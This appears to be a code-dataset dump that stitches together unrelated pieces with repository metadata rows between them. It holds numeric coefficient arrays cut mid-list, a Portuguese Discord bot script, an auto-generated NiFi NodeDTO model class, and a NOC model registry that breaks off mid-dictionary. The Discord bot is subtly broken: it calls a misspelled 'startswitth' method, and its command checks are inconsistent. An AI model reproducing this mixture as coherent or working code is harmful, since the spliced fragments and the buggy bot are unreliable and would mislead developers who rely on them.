[7,9,9,9,11,11 , -2.08879416038e-11],
[7,9,9,10,10 , -4.57262305269e-10],
[7,9,9,11,11 , -4.12937632836e-10],
[7,9,10 , 5.57453558412e-20],
[7,9,10,10 , -6.54853074505e-09],
[7,9,10,10,10,10 , 2.93747064014e-12],
[7,9,10,10,11,11 , 1.20808368697e-12],
[7,9,11,11 , -5.62921501183e-09],
[7,9,11,11,11,11 , -2.75812218566e-12],
[7,10,10 , 5.33111977512e-08],
[7,10,10,10,10 , -1.1531019754e-10],
[7,10,10,11,11 , 3.2074501656e-11],
[7,10,11 , -6.02981579327e-20],
[7,11 , 3.55753837847e-20],
[7,11,11 , 2.25393217743e-08],
[7,11,11,11,11 , -3.05987740217e-11],
[8,8 , 0.000204806432028],
[8,8,8 , 3.54448348317e-17],
[8,8,8,8 , 2.36360050673e-07],
[8,8,8,8,8 , 6.72250071563e-20],
[8,8,8,8,8,8 , 3.2480538205e-10],
[8,8,8,8,9 , 8.36269851137e-09],
[8,8,8,8,9,9 , 3.22245642634e-10],
[8,8,8,8,10,10 , 3.47936290199e-10],
[8,8,8,8,11,11 , 3.44901818344e-10],
[8,8,8,9 , 7.48409857181e-19],
[8,8,8,9,9 , 1.35975568007e-20],
[8,8,8,9,10,11 , 3.31133785067e-10],
[8,8,8,10,10 , 5.83299979874e-20],
[8,8,8,10,11 , 9.06843482337e-09],
[8,8,8,11 , 3.69253425444e-20],
[8,8,8,11,11 , 3.00045937778e-20],
[8,8,9 , 7.35255543362e-06],
[8,8,9,9 , 2.34411284466e-07],
[8,8,9,9,9 , 8.42297741991e-09],
[8,8,9,9,9,9 , 3.53642737579e-10],
[8,8,9,9,10,10 , 3.50506550884e-10],
[8,8,9,9,11,11 , 3.4793756313e-10],
[8,8,9,10 , 3.8098284653e-20],
[8,8,9,10,10 , 9.15914626267e-09],
[8,8,9,10,11 , 1.46423634625e-20],
[8,8,9,11,11 , 9.17199768746e-09],
[8,8,10 , 3.02179003933e-19],
[8,8,10,10 , 2.61481128494e-07],
[8,8,10,10,10,10 , 3.77674587675e-10],
[8,8,10,10,11,11 , 3.705031794e-10],
[8,8,10,11 , 8.37129940961e-19],
[8,8,11 , -3.10225816932e-20],
[8,8,11,11 , 2.60613453852e-07],
[8,8,11,11,11,11 , 3.714296807e-10],
[8,9 , -2.37169225231e-20],
[8,9,9 , -1.20921364759e-17],
[8,9,9,9 , -7.74270831852e-19],
[8,9,9,9,9 , -3.65544425125e-20],
[8,9,9,9,10,11 , 3.40078429902e-10],
[8,9,9,10,11 , 9.12205730759e-09],
[8,9,9,11 , 5.60547213903e-20],
[8,9,9,11,11 , -2.87868288197e-20],
[8,9,10 , -3.27166475877e-20],
[8,9,10,10 , 4.02274475497e-19],
[8,9,10,10,10,11 , 3.60201929206e-10],
[8,9,10,11 , 2.61089816526e-07],
[8,9,10,11,11,11 , 3.59732373673e-10],
[8,9,11 , 8.64714760028e-19],
[8,9,11,11 , -4.13967500636e-19],
[8,10 , -6.77626357803e-20],
[8,10,10 , 2.53982829234e-17],
[8,10,10,10,10 , 4.68322650211e-20],
[8,10,10,10,11 , 9.79915458335e-09],
[8,10,10,11 , -5.53052957553e-20],
[8,10,10,11,11 , 1.58411937393e-20],
[8,10,11 , 8.00686850094e-06],
[8,10,11,11,11 , 9.79993874106e-09],
[8,11 , 4.40457132572e-20],
[8,11,11 , 2.75603345213e-19],
[8,11,11,11 , -3.61428296849e-20],
[8,11,11,11,11 , -1.45335245885e-20],
[9,9 , 0.000206888183922],
[9,9,9 , 7.27368485878e-06],
[9,9,9,9 , 2.25521065809e-07],
[9,9,9,9,9 , 1.11308231425e-08],
[9,9,9,9,9,9 , 1.28383132992e-09],
[9,9,9,9,10,10 , 3.99197412202e-10],
[9,9,9,9,11,11 , 4.01634680383e-10],
[9,9,9,10 , 5.76445625276e-20],
[9,9,9,10,10 , 9.46051180624e-09],
[9,9,9,10,11 , -4.42865262131e-20],
[9,9,9,11,11 , 9.44333322057e-09],
[9,9,10 , 9.03678275602e-19],
[9,9,10,10 , 2.6000153177e-07],
[9,9,10,10,10,10 , 3.96844716301e-10],
[9,9,10,10,11,11 , 3.7846461808e-10],
[9,9,10,11 , -8.45921216511e-19],
[9,9,11 , -2.89049993251e-20],
[9,9,11,11 , 2.59706987624e-07],
[9,9,11,11,11,11 , 3.97093175684e-10],
[9,10,10 , 8.04742754351e-06],
[9,10,10,10 , -5.41406254528e-20],
[9,10,10,10,10 , 1.01195131165e-08],
[9,10,10,11,11 , 9.91054527299e-09],
[9,10,11 , -1.30429309592e-17],
[9,10,11,11 , -3.52891792927e-20],
[9,10,11,11,11 , -3.13032673395e-20],
[9,11 , -2.37169225231e-20],
[9,11,11 , 8.00853375795e-06],
[9,11,11,11,11 , 1.01038734669e-08],
[10,10 , 0.000215636753826],
[10,10,10 , -2.60049702719e-18],
[10,10,10,10 , 2.8360086529e-07],
[10,10,10,10,10,10 , 4.12286809283e-10],
[10,10,10,10,11,11 , 3.84629047674e-10],
[10,10,10,11 , 4.36675262812e-19],
[10,10,11 , 9.58206021581e-20],
[10,10,11,11 , 2.82161462291e-07],
[10,10,11,11,11,11 , 3.81992594091e-10],
[10,11 , -1.49077798717e-19],
[10,11,11 , -2.0017506126e-18],
[10,11,11,11 , -4.45847041444e-19],
[11,11 , 0.000219105358527],
[11,11,11 , 9.7091151579e-20],
[11,11,11,11 , 2.81381258282e-07],
[11,11,11,11,11,11 , 4.05414301196e-10]]
B = [2.2398698590300887e-05, 4.5961908954989412e-06, 3.8136364509260239e-06]
zeta = [
[
[0.0 , 1.59081081641e-13 , 0.498787464915 , -1.93456362041e-14 , -1.82577605968e-15 , -8.85908985743e-17
, -3.50958690629e-16 , 7.31618540129e-18 , -6.78015133219e-16 , 3.81783151778e-17 , -2.55248019811e-15 , -8.56946555992e-16],
[-1.59081081641e-13 , 0.0 , 1.97263384082e-15 , -1.82186289386e-15 , 0.54816240103 , -1.88737914186e-15
, -4.16333634234e-15 , -5.53723733532e-15 , -4.8017145815e-15 , 8.76521077942e-14 , 0.836371916134 , -8.89593954057e-13],
[-0.498787464915 , -1.97263384082e-15 , 0.0 , -3.96651401657e-16 , -1.59407209654e-13 , 2.28983498829e-15
, 1.05193631583e-14 , -5.92581539394e-15 , -3.16413562018e-14 , 2.6645352591e-15 , -9.12409037213e-13 , -0.866724330364],
[1.93456362041e-14 , 1.82186289386e-15 , 3.96651401657e-16 , 0.0 , -7.54257767355e-15 , -1.85962356625e-15
, 0.533232207071 , 1.02695629778e-14 , 0.845968919844 , -1.36735067713e-12 , 1.25177646026e-14 , -3.54716256368e-14],
[1.82577605968e-15 , -0.54816240103 , 1.59407209654e-13 , 7.54257767355e-15 , 0.0 , 2.26330053846e-16
, 1.99308683064e-15 , 5.05361422418e-18 , 3.66955573646e-15 , -9.56900723456e-18 , 1.14085884765e-15 , 2.99114471692e-16],
[8.85908985743e-17 , 1.88737914186e-15 , -2.28983498829e-15 , 1.85962356625e-15 , -2.26330053846e-16 , 0.0
, 1.55401751862e-16 , 6.28931682639e-30 , 2.46543720394e-16 , -4.35207782137e-28 , -3.45328502024e-16 , 1.53941092438e-16],
[3.50958690629e-16 , 4.16333634234e-15 , -1.05193631583e-14 , -0.533232207071 , -1.99308683064e-15 , -1.55401751862e-16
, 0.0 , -5.08755735264e-18 , -2.06983095169e-16 , -1.48001668437e-17 , 3.04144642149e-16 , -2.89060648443e-16],
[-7.31618540129e-18 , 5.53723733532e-15 , 5.92581539394e-15 , -1.02695629778e-14 , -5.05361422418e-18 , -6.29817610414e-30
, 5.08755735264e-18 , 0.0 , 8.0713717986e-18 , -1.35489171588e-29 , -7.71067297595e-18 , -1.27130618526e-17],
[6.78015133219e-16 , 4.8017145815e-15 , 3.16413562018e-14 , -0.845968919844 , -3.66955573646e-15 , -2.46543720394e-16
, 2.06983095169e-16 , -8.0713717986e-18 , 0.0 , -2.34803543232e-17 , -2.91865580446e-16 , -2.47949994183e-16],
[-3.81783151778e-17 , -8.76521077942e-14 , -2.6645352591e-15 , 1.36735067713e-12 , 9.56900723456e-18 , 4.35219337717e-28
, 1.48001668437e-17 , 1.35504579027e-29 , 2.34803543232e-17 , 0.0 , 1.4600142032e-17 , -6.63410309672e-17],
[2.55248019811e-15 , -0.836371916134 , 9.12409037213e-13 , -1.25177646026e-14 , -1.14085884765e-15 , 3.45328502024e-16
, -3.04144642149e-16 , 7.71067297595e-18 , 2.91865580446e-16 , -1.4600142032e-17 , 0.0 , 5.10862685654e-17],
[8.56946555992e-16 , 8.89593954057e-13 , 0.866724330364 , 3.54716256368e-14 , -2.99114471692e-16 , -1.53941092438e-16
, 2.89060648443e-16 , 1.27130618526e-17 , 2.47949994183e-16 , 6.63410309672e-17 , -5.10862685654e-17 , 0.0]],
[
[0.0 , -4.77395900589e-15 , 3.06976666309e-14 , 0.866724330364 , 3.75280349953e-15 , 1.30898185924e-15
, 6.20188537507e-16 , -2.30530274217e-15 , -5.07777703551e-16 , -1.63866194265e-15 , 2.88677192272e-16 , -2.91751599619e-16],
[4.77395900589e-15 , 0.0 , 5.860406578e-16 , 2.87662478926e-15 , -2.08166817117e-15 , -0.347654390213
, 2.27790009077e-13 , 0.761389290553 , 7.30915328262e-13 , 0.547195370226 , -5.18196596744e-14 , -7.11930514541e-15],
[-3.06976666309e-14 , -5.860406578e-16 , 0.0 , -7.10777564301e-16 , -7.52176099184e-15 , 1.06886721696e-13
, 0.845968919844 , -2.05085948224e-13 , -0.533232207071 , 7.134570712e-13 , 5.6760152134e-15 , 4.73787675759e-14],
[-0.866724330364 , -2.87662478926e-15 , 7.10777564301e-16 , 0.0 , -2.19269047363e-14 , -1.14352971536e-14
, -2.40085729075e-14 , 8.16013923099e-15 , 5.59829960167e-14 , -3.85802501057e-15 , 3.80001585754e-13 , 0.498787464915],
[-3.75280349953e-15 , 2.08166817117e-15 , 7.52176099184e-15 , 2.19269047363e-14 , 0.0 , -4.66192664897e-16
, -2.71570388323e-16 , 1.02099703723e-15 , 1.7117659307e-16 , 7.33770304781e-16 , 1.5811730769e-27 , 2.15968477898e-15],
[-1.30898185924e-15 , 0.347654390213 , -1.06886721696e-13 , 1.14352971536e-14 , 4.66192664897e-16 , 0.0
, 4.99927692364e-17 , -3.17574116672e-16 , 9.05099006974e-17 , -2.19861942388e-16 , -1.22484405323e-17 , 1.32120140401e-16],
[-6.20188537507e-16 , -2.27790009077e-13 , -0.845968919844 , 2.40085729075e-14 , 2.71570388323e-16 , -4.99927692364e-17
, 0.0 , 4.26148350142e-16 , -2.27709060069e-16 , 2.50429826289e-16 , 1.87658007983e-17 , -9.72452971984e-17],
[2.30530274217e-15 , -0.761389290553 , 2.05085948224e-13 , -8.16013923099e-15 , -1.02099703723e-15 , 3.17574116672e-16
, -4.26148350142e-16 , 0.0 , 1.37430284869e-18 , -1.83359054044e-17 , 2.68250069895e-17 , 3.3762653335e-17],
[5.07777703551e-16 , -7.30915328262e-13 , 0.533232207071 , -5.59829960167e-14 , -1.7117659307e-16 , -9.05099006974e-17
, 2.27709060069e-16 , -1.37430284869e-18 , 0.0 , 3.42060105952e-17 , -1.18284834613e-17 , -5.95529301277e-18],
[1.63866194265e-15 , -0.547195370226 , -7.134570712e-13 , 3.85802501057e-15 , -7.33770304781e-16 , 2.19861942388e-16
, -2.50429826289e-16 , 1.83359054044e-17 , -3.42060105952e-17 , 0.0 , 1.92786000711e-17 , 3.46885400828e-17],
[-2.88677192272e-16 , 5.18196596744e-14 , -5.6760152134e-15 , -3.80001585754e-13 , -1.58121005476e-27 , 1.22484405323e-17
, -1.87658007983e-17 , -2.68250069895e-17 , 1.18284834613e-17 , -1.92786000711e-17 , 0.0 , 1.66129598383e-16],
[2.91751599619e-16 , 7.11930514541e-15 , -4.73787675759e-14 , -0.498787464915 , -2.15968477898e-15 , -1.32120140401e-16
, 9.72452971984e-17 , -3.3762653335e-17 , 5.95529301277e-18 , -3.46885400828e-17 , -1.66129598383e-16 , 0.0]],
[
[0.0 , -4.83061399328e-18 , 4.69873815694e-17 , 1.15606122492e-17 , 1.04083408559e-15 , -8.32667268469e-15
, 0.0402066346758 , -7.25808302349e-15 , 0.999191386336 , -1.63764835026e-12 , -4.92661467177e-16 , -7.12277459236e-14],
[4.83061399328e-18 , 0.0 , 8.03371240938e-32 , 6.36147594518e-31 , -1.32446610972e-16 , -4.44397625952e-16
, -1.0063394774e-16 , -2.71326181884e-16 , 3.35765938913e-15 , -1.07928830809e-15 , 1.40350076641e-16 , -6.90346305966e-16],
[-4.69873815694e-17 , -8.03371240938e-32 , 0.0 , 3.20820659e-31 , -9.8518934423e-17 , 9.84091407643e-17
, -1.08632350693e-17 , 3.07808614455e-17 , -1.0297132247e-15 , 1.97122781969e-16 , 7.63944922794e-17 , -2.51883934728e-16],
[-1.15606122492e-17 , -6.36147594518e-31 , -3.20820659e-31 , 0.0 , 9.49377192028e-17 , -1.50026390563e-15
, 6.73720352646e-18 , -9.16479521631e-16 , 9.13790094471e-16 , -3.64433169101e-15 , -1.69603797147e-16 , 1.98317653511e-16],
[-1.02695629778e-15 , 1.32446610972e-16 , 9.8518934423e-17 , -9.49377192028e-17 , 0.0 , 0.361678563087
, -2.08860706508e-15 , 0.237096099428 , 1.482629991e-12 , 0.901650739832 , -8.95949980873e-14 , -5.55111512313e-15],
[8.32667268469e-15 , 4.44397625952e-16 , -9.84091407643e-17 , 1.50026390563e-15 , -0.361678563087 , 0.0
, -3.34454686168e-15 , -2.82066037194e-15 , 2.86576318231e-15 , 6.05626659933e-14 , 0.652715579308 , -5.02368979749e-13],
[-0.0402066346758 , 1.0063394774e-16 , 1.08632350693e-17 , -6.73720352646e-18 , 2.09554595898e-15 , 3.34454686168e-15
, 0.0 , 2.87964097012e-15 , 7.14567294224e-14 , 4.0800696155e-15 , 7.81055775612e-13 , 0.999191386336],
[7.25808302349e-15 , 2.71326181884e-16 , -3.07808614455e-17 , 9.16479521631e-16 , -0.237096099428 , 2.81719092499e-15
, -2.85882428841e-15 , 0.0 , 1.51267887105e-15 , -8.06785194207e-14 , -0.754953760684 , 5.97973059957e-13],
[-0.999191386336 , -3.35765938913e-15 , 1.0297132247e-15 , -9.13790094471e-16 , -1.48261958266e-12 , -2.74780198595e-15
, -7.14428516346e-14 , -1.51267887105e-15 , 0.0 , -2.35922392733e-16 , -1.34878219704e-13 , -0.0402066346758],
[1.6376067169e-12 , 1.07928830809e-15 , -1.97122781969e-16 , 3.64433169101e-15 , -0.901650739832 , -6.05904215689e-14
, -4.0800696155e-15 , 8.06854583146e-14 , 2.35922392733e-16 , 0.0 , -0.0633023835066 , 1.13034581695e-13],
[4.99600361081e-16 , -1.40350076641e-16 , -7.63944922794e-17 , 1.69603797147e-16 , 8.96227536629e-14 , -0.652715579308
, -7.81041897824e-13 , 0.754953760684 , 1.34878219704e-13 , 0.0633023835066 , 0.0 , -6.24500451352e-16],
[7.12208070297e-14 , 6.90346305966e-16 , 2.51883934728e-16 , -1.98317653511e-16 , 5.55111512313e-15 , 5.02375918643e-13
, -0.999191386336 , -5.97966121063e-13 , 0.0402066346758 , -1.13034581695e-13 , 6.24500451352e-16 , 0.0]]]
| 48.697959
| 130
| 0.465112
|
c029026da079103275fcf3846e9a3cb0b9572a9c
| 1,702
|
py
|
Python
|
Main.py
|
phaalonso/BotDiscord
|
228d14af94cf58dbea93428ac5fdd21d324dfcda
|
[
"Apache-2.0"
] | 1
|
2018-03-14T17:45:32.000Z
|
2018-03-14T17:45:32.000Z
|
Main.py
|
phaalonso/BotDiscord
|
228d14af94cf58dbea93428ac5fdd21d324dfcda
|
[
"Apache-2.0"
] | null | null | null |
Main.py
|
phaalonso/BotDiscord
|
228d14af94cf58dbea93428ac5fdd21d324dfcda
|
[
"Apache-2.0"
] | null | null | null |
import discord
import random
import Secreto
import builds
TOKEN = Secreto.seu_token() # linkagem do token
client = discord.Client()
RhinoT = builds.Rhino(True)
RhinoF = builds.Rhino(False)
@client.event
async def on_ready():
print('Bot ONLINE - Olá Mundo!')
print(client.user.name)
print(client.user.id)
print('-----------------------')
await client.change_presence(game=discord.Game(name='Online'))
@client.event
async def on_message(message): # Resposta ao usuário
if message.author == client.user:
return
if message.content.startswitth("!"):
if message.content.lower().startswith("test"):
await client.send_message(message.channel, "Ola Mundo, estou vivo!")
elif message.content.lower().startswith("moeda"): # Cara ou coroa 50,50%
choice = random.randint(1, 2)
if choice == 1:
await client.add_reaction(message, '😀')
elif choice == 2:
await client.add_reaction(message, '👑')
elif message.content == "cookie": # Resposta ao usuário atráves de emoticon
await client.send_message(message.channel, ":cookie:")
elif str(message.content).startswith('!build'):
segunda=str(message.content).split()[1]
'''if segunda == 'Teste':
await client.send_message(message.channel,'OI')
print('daijwi')'''
builds = [('Rhino', 'link1','descri1'), ('Loki', 'link2','descri2'), ('Banshee', 'link3','descri3'), ('Vauban', 'link4','descri4')]
for i in builds:
if i[0]==segunda:
await client.send_message(message.channel, i[1])
await client.send_message(message.channel, i[2])
client.run(TOKEN)
| 31.518519
| 139
| 0.625734
|
d617b1176bc67df38938dcb3ae4413ac2f1ad8de
| 10,834
|
py
|
Python
|
nipyapi/nifi/models/node_dto.py
|
esecules/nipyapi
|
e8a53b79a5e1a6b29446f43d2b23b6a3e60873f1
|
[
"Apache-2.0"
] | null | null | null |
nipyapi/nifi/models/node_dto.py
|
esecules/nipyapi
|
e8a53b79a5e1a6b29446f43d2b23b6a3e60873f1
|
[
"Apache-2.0"
] | null | null | null |
nipyapi/nifi/models/node_dto.py
|
esecules/nipyapi
|
e8a53b79a5e1a6b29446f43d2b23b6a3e60873f1
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.11.1-SNAPSHOT
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class NodeDTO(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'node_id': 'str',
'address': 'str',
'api_port': 'int',
'status': 'str',
'heartbeat': 'str',
'connection_requested': 'str',
'roles': 'list[str]',
'active_thread_count': 'int',
'queued': 'str',
'events': 'list[NodeEventDTO]',
'node_start_time': 'str'
}
attribute_map = {
'node_id': 'nodeId',
'address': 'address',
'api_port': 'apiPort',
'status': 'status',
'heartbeat': 'heartbeat',
'connection_requested': 'connectionRequested',
'roles': 'roles',
'active_thread_count': 'activeThreadCount',
'queued': 'queued',
'events': 'events',
'node_start_time': 'nodeStartTime'
}
def __init__(self, node_id=None, address=None, api_port=None, status=None, heartbeat=None, connection_requested=None, roles=None, active_thread_count=None, queued=None, events=None, node_start_time=None):
"""
NodeDTO - a model defined in Swagger
"""
self._node_id = None
self._address = None
self._api_port = None
self._status = None
self._heartbeat = None
self._connection_requested = None
self._roles = None
self._active_thread_count = None
self._queued = None
self._events = None
self._node_start_time = None
if node_id is not None:
self.node_id = node_id
if address is not None:
self.address = address
if api_port is not None:
self.api_port = api_port
if status is not None:
self.status = status
if heartbeat is not None:
self.heartbeat = heartbeat
if connection_requested is not None:
self.connection_requested = connection_requested
if roles is not None:
self.roles = roles
if active_thread_count is not None:
self.active_thread_count = active_thread_count
if queued is not None:
self.queued = queued
if events is not None:
self.events = events
if node_start_time is not None:
self.node_start_time = node_start_time
@property
def node_id(self):
"""
Gets the node_id of this NodeDTO.
The id of the node.
:return: The node_id of this NodeDTO.
:rtype: str
"""
return self._node_id
@node_id.setter
def node_id(self, node_id):
"""
Sets the node_id of this NodeDTO.
The id of the node.
:param node_id: The node_id of this NodeDTO.
:type: str
"""
self._node_id = node_id
@property
def address(self):
"""
Gets the address of this NodeDTO.
The node's host/ip address.
:return: The address of this NodeDTO.
:rtype: str
"""
return self._address
@address.setter
def address(self, address):
"""
Sets the address of this NodeDTO.
The node's host/ip address.
:param address: The address of this NodeDTO.
:type: str
"""
self._address = address
@property
def api_port(self):
"""
Gets the api_port of this NodeDTO.
The port the node is listening for API requests.
:return: The api_port of this NodeDTO.
:rtype: int
"""
return self._api_port
@api_port.setter
def api_port(self, api_port):
"""
Sets the api_port of this NodeDTO.
The port the node is listening for API requests.
:param api_port: The api_port of this NodeDTO.
:type: int
"""
self._api_port = api_port
@property
def status(self):
"""
Gets the status of this NodeDTO.
The node's status.
:return: The status of this NodeDTO.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this NodeDTO.
The node's status.
:param status: The status of this NodeDTO.
:type: str
"""
self._status = status
@property
def heartbeat(self):
"""
Gets the heartbeat of this NodeDTO.
the time of the nodes's last heartbeat.
:return: The heartbeat of this NodeDTO.
:rtype: str
"""
return self._heartbeat
@heartbeat.setter
def heartbeat(self, heartbeat):
"""
Sets the heartbeat of this NodeDTO.
the time of the nodes's last heartbeat.
:param heartbeat: The heartbeat of this NodeDTO.
:type: str
"""
self._heartbeat = heartbeat
@property
def connection_requested(self):
"""
Gets the connection_requested of this NodeDTO.
The time of the node's last connection request.
:return: The connection_requested of this NodeDTO.
:rtype: str
"""
return self._connection_requested
@connection_requested.setter
def connection_requested(self, connection_requested):
"""
Sets the connection_requested of this NodeDTO.
The time of the node's last connection request.
:param connection_requested: The connection_requested of this NodeDTO.
:type: str
"""
self._connection_requested = connection_requested
@property
def roles(self):
"""
Gets the roles of this NodeDTO.
The roles of this node.
:return: The roles of this NodeDTO.
:rtype: list[str]
"""
return self._roles
@roles.setter
def roles(self, roles):
"""
Sets the roles of this NodeDTO.
The roles of this node.
:param roles: The roles of this NodeDTO.
:type: list[str]
"""
self._roles = roles
@property
def active_thread_count(self):
"""
Gets the active_thread_count of this NodeDTO.
The active threads for the NiFi on the node.
:return: The active_thread_count of this NodeDTO.
:rtype: int
"""
return self._active_thread_count
@active_thread_count.setter
def active_thread_count(self, active_thread_count):
"""
Sets the active_thread_count of this NodeDTO.
The active threads for the NiFi on the node.
:param active_thread_count: The active_thread_count of this NodeDTO.
:type: int
"""
self._active_thread_count = active_thread_count
@property
def queued(self):
"""
Gets the queued of this NodeDTO.
The queue the NiFi on the node.
:return: The queued of this NodeDTO.
:rtype: str
"""
return self._queued
@queued.setter
def queued(self, queued):
"""
Sets the queued of this NodeDTO.
The queue the NiFi on the node.
:param queued: The queued of this NodeDTO.
:type: str
"""
self._queued = queued
@property
def events(self):
"""
Gets the events of this NodeDTO.
The node's events.
:return: The events of this NodeDTO.
:rtype: list[NodeEventDTO]
"""
return self._events
@events.setter
def events(self, events):
"""
Sets the events of this NodeDTO.
The node's events.
:param events: The events of this NodeDTO.
:type: list[NodeEventDTO]
"""
self._events = events
@property
def node_start_time(self):
"""
Gets the node_start_time of this NodeDTO.
The time at which this Node was last refreshed.
:return: The node_start_time of this NodeDTO.
:rtype: str
"""
return self._node_start_time
@node_start_time.setter
def node_start_time(self, node_start_time):
"""
Sets the node_start_time of this NodeDTO.
The time at which this Node was last refreshed.
:param node_start_time: The node_start_time of this NodeDTO.
:type: str
"""
self._node_start_time = node_start_time
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, NodeDTO):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 26.684729
| 479
| 0.567011
|
cdb91177deccef3c40e9a2ed356617713369c20c
| 17,888
|
py
|
Python
|
models.py
|
xUndero/noc
|
9fb34627721149fcf7064860bd63887e38849131
|
[
"BSD-3-Clause"
] | 1
|
2019-09-20T09:36:48.000Z
|
2019-09-20T09:36:48.000Z
|
models.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
models.py
|
ewwwcha/noc
|
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# ---------------------------------------------------------------------
# NOC models lazy loading and utilities
# ---------------------------------------------------------------------
# Copyright (C) 2007-2019 The NOC Project
# See LICENSE for details
# ---------------------------------------------------------------------
# Python modules
import logging
logger = logging.getLogger(__name__)
def is_document(object):
"""
Check object is mongoengine document
:param object:
:return:
"""
return getattr(object, "_is_document", False)
def get_model_id(object):
"""
Returns model id for instance object
"""
if is_document(object):
# Document
return "%s.%s" % (object.__module__.split(".")[1], object._class_name)
else:
# Model
return "%s.%s" % (
object._meta.app_label if object._meta.app_label != "auth" else "main",
object._meta.object_name,
)
def get_model(model_id):
"""
Returns model/document class for given model id
"""
m = _MCACHE.get(model_id)
if not m:
assert model_id in _MODELS, "Invalid model id: %s" % model_id
logger.debug("Loading model %s", model_id)
mp = _MODELS[model_id]
mod_name, cls_name = mp.rsplit(".", 1)
mod = __import__(mod_name, {}, {}, [cls_name])
m = getattr(mod, cls_name)
_MCACHE[model_id] = m
return m
def get_object(model_id, object_id):
"""
Return an object instance or None
"""
m = get_model(model_id)
try:
return m.objects.get(id=object_id)
except m.DoesNotExist:
return None
def load_models():
for alias in _MODELS:
get_model(alias)
def iter_model_id():
"""
Iterate all model ids
"""
for m in _MODELS:
yield m
# Model cache: model_id -> class
_MCACHE = {}
_MODELS = {
# aaa models
"aaa.APIKey": "noc.aaa.models.apikey.APIKey",
"aaa.Group": "noc.aaa.models.group.Group",
"aaa.Permission": "noc.aaa.models.permission.Permission",
"aaa.User": "noc.aaa.models.user.User",
"aaa.UserContact": "noc.aaa.models.usercontact.UserContact",
# main models
"main.APIToken": "noc.main.models.apitoken.APIToken",
"main.AuditTrail": "noc.main.models.audittrail.AuditTrail",
"main.Checkpoint": "noc.main.models.checkpoint.Checkpoint",
"main.CHPolicy": "noc.main.models.chpolicy.CHPolicy",
"main.CronTab": "noc.main.models.crontab.CronTab",
"main.CustomField": "noc.main.models.customfield.CustomField",
"main.CustomFieldEnumGroup": "noc.main.models.customfieldenumgroup.CustomFieldEnumGroup",
"main.CustomFieldEnumValue": "noc.main.models.customfieldenumvalue.CustomFieldEnumValue",
"main.DatabaseStorage": "noc.main.models.databasestorage.DatabaseStorage",
"main.DocCategory": "noc.main.models.doccategory.DocCategory",
"main.ExtStorage": "noc.main.models.extstorage.ExtStorage",
"main.Favorites": "noc.main.models.favorites.Favorites",
"main.Handler": "noc.main.models.handler.Handler",
"main.Language": "noc.main.models.language.Language",
"main.MIMEType": "noc.main.models.mimetype.MIMEType",
"main.NotificationGroup": "noc.main.models.notificationgroup.NotificationGroup",
"main.NotificationGroupOther": "noc.main.models.notificationgroup.NotificationGroupOther",
"main.NotificationGroupUser": "noc.main.models.notificationgroup.NotificationGroupUser",
"main.OrderMap": "noc.main.models.ordermap.OrderMap",
"main.Pool": "noc.main.models.pool.Pool",
"main.PrefixTable": "noc.main.models.prefixtable.PrefixTable",
"main.PyRule": "noc.main.models.pyrule.PyRule",
"main.RefBook": "noc.main.models.refbook.RefBook",
"main.RefBookData": "noc.main.models.refbookdata.RefBookData",
"main.RefBookField": "noc.main.models.refbookfield.RefBookField",
"main.RemoteSystem": "noc.main.models.remotesystem.RemoteSystem",
"main.ReportSubscription": "noc.main.models.reportsubscription.ReportSubscription",
"main.ResourceState": "noc.main.models.resourcestate.ResourceState",
"main.SlowOp": "noc.main.models.slowop.SlowOp",
"main.Style": "noc.main.models.style.Style",
"main.SystemNotification": "noc.main.models.systemnotification.SystemNotification",
"main.SystemTemplate": "noc.main.models.systemtemplate.SystemTemplate",
"main.Tag": "noc.main.models.tag.Tag",
"main.Template": "noc.main.models.template.Template",
"main.TextIndex": "noc.main.models.textindex.TextIndex",
"main.TimePattern": "noc.main.models.timepattern.TimePattern",
"main.TimePatternTerm": "noc.main.models.timepatternterm.TimePatternTerm",
"main.UserState": "noc.main.models.userstate.UserState",
#
"dev.Quiz": "noc.dev.models.quiz.Quiz",
"dev.Spec": "noc.dev.models.spec.Spec",
# project models
"project.Project": "noc.project.models.project.Project",
# gis models
"gis.Address": "noc.gis.models.address.Address",
"gis.Area": "noc.gis.models.area.Area",
"gis.Building": "noc.gis.models.building.Building",
"gis.Division": "noc.gis.models.division.Division",
"gis.Layer": "noc.gis.models.layer.Layer",
"gis.LayerUserSettings": "noc.gis.models.layerusersettings.LayerUserSettings",
"gis.Overlay": "noc.gis.models.overlay.Overlay",
"gis.Street": "noc.gis.models.street.Street",
# inv models
"inv.AllocationGroup": "noc.inv.models.allocationgroup.AllocationGroup",
"inv.Capability": "noc.inv.models.capability.Capability",
"inv.ConnectionRule": "noc.inv.models.connectionrule.ConnectionRule",
"inv.ConnectionType": "noc.inv.models.connectiontype.ConnectionType",
"inv.Coverage": "noc.inv.models.coverage.Coverage",
"inv.CoveredBuilding": "noc.inv.models.coveredbuilding.CoveredBuilding",
"inv.CoveredObject": "noc.inv.models.coveredobject.CoveredObject",
